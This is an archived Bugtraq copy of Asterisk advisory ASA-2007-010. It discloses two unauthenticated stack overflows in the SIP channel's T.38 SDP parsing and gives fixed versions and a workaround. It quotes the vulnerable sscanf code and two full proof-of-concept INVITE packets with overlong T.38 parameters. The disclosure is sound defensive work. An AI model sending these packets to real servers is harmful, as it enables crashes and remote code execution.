Bugtraq mailing list archives
ASA-2007-010: Two stack buffer overflows in SIP channel's T.38 SDP parsing code
From: "Kevin P. Fleming" <kpfleming () digium com>
Date: Wed, 25 Apr 2007 14:04:11 -0500
Asterisk Project Security Advisory - ASA-2007-010
+------------------------------------------------------------------------+
| Product | Asterisk |
|--------------------+---------------------------------------------------|
| Summary | Two stack buffer overflows in SIP channel's T.38 |
| | SDP parsing code |
|--------------------+---------------------------------------------------|
| Nature of Advisory | Exploitable Stack Buffer Overflow |
|--------------------+---------------------------------------------------|
| Susceptibility | Remote Unauthenticated Sessions |
|--------------------+---------------------------------------------------|
| Severity | Moderate |
|--------------------+---------------------------------------------------|
| Exploits Known | No |
|--------------------+---------------------------------------------------|
| Reported On | March 22, 2007 |
|--------------------+---------------------------------------------------|
| Reported By | Barrie Dempster, NGS Software, |
| | <barrie () ngssoftware com> |
|--------------------+---------------------------------------------------|
| Posted On | April 24, 2007 |
|--------------------+---------------------------------------------------|
| Last Updated On | April 24, 2007 |
|--------------------+---------------------------------------------------|
| Advisory Contact | kpfleming () digium com |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------------------+
|Description|Two closely related stack based buffer overflows exist in the SIP/SDP |
| |handler of Asterisk, the vulnerabilities are very similar but exist as |
| |two separate unsafe function calls. The T38FaxRateManagement and |
| |T38FaxUdpEC SDP parameters can be exploited remotely leading to |
| |arbitrary code execution without authentication. In order for these |
| |overflows to occur, t38 fax over SIP must be enabled in sip.conf. |
| |Examples of SIP INVITE packets are shown below, however these |
| |vulnerabilities can be triggered with a number of different SIP messages|
| |affecting calls received by Asterisk, or in response to calls made by |
| |Asterisk. |
| | |
| |Remote Unauthenticated stack overflow in Asterisk SIP/SDP |
| |T38FaxRateManagement parameter |
| | |
| |A remote unauthenticated stack overflow exists in the SIP/SDP handler of|
| |Asterisk. By sending a SIP packet with SDP data which includes an overly|
| |long T38 parameter it is possible to overflow a stack based buffer and |
| |execute arbitrary code. |
| | |
| |The process_sdp function of chan_sip.c in Asterisk contains the |
| |following vulnerable call to sscanf. |
| | |
| |else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) { |
| | |
| |found = 1; |
| | |
| |if (option_debug > 2) |
| | |
| |ast_log(LOG_DEBUG, "RateMangement: %s\n", s); |
| | |
| |if (!strcasecmp(s, "localTCF")) |
| | |
| |peert38capability |= |
| | |
| |T38FAX_RATE_MANAGEMENT_LOCAL_TCF; |
| | |
| |else if (!strcasecmp(s, "transferredTCF")) |
| | |
| |peert38capability |= |
| | |
| |T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF; |
| | |
| |This attempts to read the "T38FaxRateManagement:" option from the SDP |
| |within a SIP packet and copy the succeeding string into "s". There are |
| |no checks on the length of this string and we can therefore write past |
| |the boundaries of the "s" variable overwriting adjacent memory on the |
| |stack. "s" is defined earlier in this function as being a character |
| |array of only 256 bytes. The following example packet demonstrates an |
| |overflow of this parameter: |
| | |
| |INVITE sip:200@127.0.0.1 SIP/2.0 |
| | |
| |Date: Wed, 21 Mar 2007 4:20:09 GMT |
| | |
| |CSeq: 1 INVITE |
| | |
| |Via: SIP/2.0/UDP |
| | |
| |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
| | |
| |User-Agent: NGS/2.0 |
| | |
| |From: "Barrie Dempster" |
| | |
| |<sip:zeedo@10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 |
| | |
| |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades |
| | |
| |To: <sip:200@localhost> |
| | |
| |Contact: <sip:zeedo@10.0.0.123:5068;transport=udp> |
| | |
| |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE |
| | |
| |Content-Type: application/sdp |
| | |
| |Content-Length: 796 |
| | |
| |Max-Forwards: 70 |
| | |
| |v=0 |
| | |
| |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1 |
| | |
| |s=- |
| | |
| |c=IN IP4 127.0.0.1 |
| | |
| |t=0 0 |
| | |
| |m=image 5004 UDPTL t38 |
| | |
| |a=T38FaxVersion:0 |
| | |
| |a=T38MaxBitRate:14400 |
| | |
| |a=T38FaxMaxBuffer:1024 |
| | |
| |a=T38FaxMaxDatagram:238 |
| | |
| |a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAAAAAAAAA |
| | |
| |a=T38FaxUdpEC:t38UDPRedundancy |
| | |
| |------------------------------------------------- |
| | |
| |Remote Unauthenticated stack overflow in Asterisk SIP/SDP T38FaxUdpEC |
| |parameter |
| | |
| |A remote unauthenticated stack overflow exists in the SIP/SDP handler of|
| |Asterisk. By sending a SIP packet with SDP data which includes an overly|
| |long T38FaxUdpEC parameter it is possible to overflow a stack based |
| |buffer and execute arbitrary code. |
| | |
| |The process_sdp function of chan_sip.c in Asterisk contains the |
| |following vulnerable call to sscanf. |
| | |
| |else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) { |
| | |
| |found = 1; |
| | |
| |if (option_debug > 2) |
| | |
| |ast_log(LOG_DEBUG, "UDP EC: %s\n", s); |
| | |
| |if (!strcasecmp(s, "t38UDPRedundancy")) { |
| | |
| |peert38capability |= |
| | |
| |T38FAX_UDP_EC_REDUNDANCY; |
| | |
| |ast_udptl_set_error_correction_scheme(p->udptl, |
| | |
| |UDPTL_ERROR_CORRECTION_REDUNDANCY); |
| | |
| |This attempts to read the "T38FaxUdpEC:" option from the SDP within a |
| |SIP packet and copy the succeeding string into "s". There are no checks |
| |on the length of this string and we can therefore write past the |
| |boundaries of the "s" variable overwriting adjacent memory on the stack.|
| |"s" is defined earlier in this function as being a character array of |
| |only 256 bytes. The following example packet demonstrates an overflow of|
| |this parameter: |
| | |
| |INVITE sip:200@127.0.0.1 SIP/2.0 |
| | |
| |Date: Wed, 21 Mar 2007 4:20:09 GMT |
| | |
| |CSeq: 1 INVITE |
| | |
| |Via: SIP/2.0/UDP |
| | |
| |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
| | |
| |User-Agent: NGS/2.0 |
| | |
| |From: "Barrie Dempster" |
| | |
| |<sip:zeedo@10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 |
| | |
| |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades |
| | |
| |To: <sip:200@localhost> |
| | |
| |Contact: <sip:zeedo@10.0.0.123:5068;transport=udp> |
| | |
| |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE |
| | |
| |Content-Type: application/sdp |
| | |
| |Content-Length: 796 |
| | |
| |Max-Forwards: 70 |
| | |
| |v=0 |
| | |
| |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1 |
| | |
| |s=- |
| | |
| |c=IN IP4 127.0.0.1 |
| | |
| |t=0 0 |
| | |
| |m=image 5004 UDPTL t38 |
| | |
| |a=T38FaxVersion:0 |
| | |
| |a=T38MaxBitRate:14400 |
| | |
| |a=T38FaxMaxBuffer:1024 |
| | |
| |a=T38FaxMaxDatagram:238 |
| | |
| |a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| | |
| |AAAAAAAAA |
+------------------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Resolution | T.38 support in the affected versions of Asterisk is not |
| | enabled by default, therefore the severity of this issue |
| | is 'moderate'. |
| | |
| | Users who are using the default configuration with |
| | 't38_udptl' set to 'no' or an equivalent value are not |
| | susceptible to this vulnerability. Users who have set |
| | this configuration item to 'yes' or an equivalent value |
| | but are not actually using T.38 support can set it to |
| | 'no' to secure their systems against this vulnerability. |
| | |
| | All other users are urged to upgrade to the appropriate |
| | version of their Asterisk product listed in the |
| | 'Corrected In' section below. |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.0.x | not affected; does not |
| | | contain T.38 support |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.2.x | not affected, does not |
| | | contain T.38 support |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.4.x | all releases prior to |
| | | 1.4.3 |
|------------------------------+-------------+---------------------------|
| Asterisk Business Edition | A.x.x | not affected, does not |
| | | contain T.38 support |
|------------------------------+-------------+---------------------------|
| Asterisk Business Edition | B.x.x | not affected, does not |
| | | contain T.38 support |
|------------------------------+-------------+---------------------------|
| AsteriskNOW | pre-release | all releases prior to and |
| | | including Beta 5 |
|------------------------------+-------------+---------------------------|
| Asterisk Appliance Developer | 0.x.x | all releases prior to |
| Kit | | 0.4.0 |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Corrected In |
|------------------------------------------------------------------------|
| Product | Release |
|--------------------+---------------------------------------------------|
| Asterisk Open | 1.4.3, available from |
| Source | ftp://ftp.digium.com/pub/telephony/asterisk |
|--------------------+---------------------------------------------------|
| AsteriskNOW | Beta 6, when available from |
| | http://www.asterisknow.org, Beta 5 users can use |
| | use 'System Update' in the appliance control |
| | panel to update their version of AsteriskNOW |
|--------------------+---------------------------------------------------|
| Asterisk Appliance | 0.4.0, available from |
| Developer Kit | ftp://ftp.digium.com/pub/telephony/aadk |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Links | |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Asterisk Project Security Advisories are posted at |
| http://www.asterisk.org/security. |
| |
| This document may be superseded by later versions; if so, the latest |
| version will be posted at |
| http://www.asterisk.org/files/ASA-2007-010.pdf. |
+------------------------------------------------------------------------+
Asterisk Project Security Advisory - ASA-2007-010
Copyright (c) 2007 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its
original, unaltered form.
Current thread:
- ASA-2007-010: Two stack buffer overflows in SIP channel's T.38 SDP parsing code Kevin P. Fleming (Apr 25)